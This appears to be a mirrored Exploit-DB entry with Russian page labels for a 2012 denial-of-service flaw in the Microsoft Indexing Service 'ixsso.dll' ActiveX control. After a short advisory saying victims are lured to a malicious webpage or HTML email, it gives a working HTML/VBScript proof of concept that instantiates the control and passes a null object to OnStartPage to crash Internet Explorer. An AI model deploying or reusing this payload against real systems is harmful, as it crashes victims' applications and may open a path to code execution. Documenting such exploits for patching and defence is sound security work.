- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37673
- Проверка EDB
-
- Пройдено
- Автор
- COOLKAVEH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2012-08-24
Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service
HTML:
source: https://www.securityfocus.com/bid/55202/info
Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.
An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>
- Источник
- www.exploit-db.com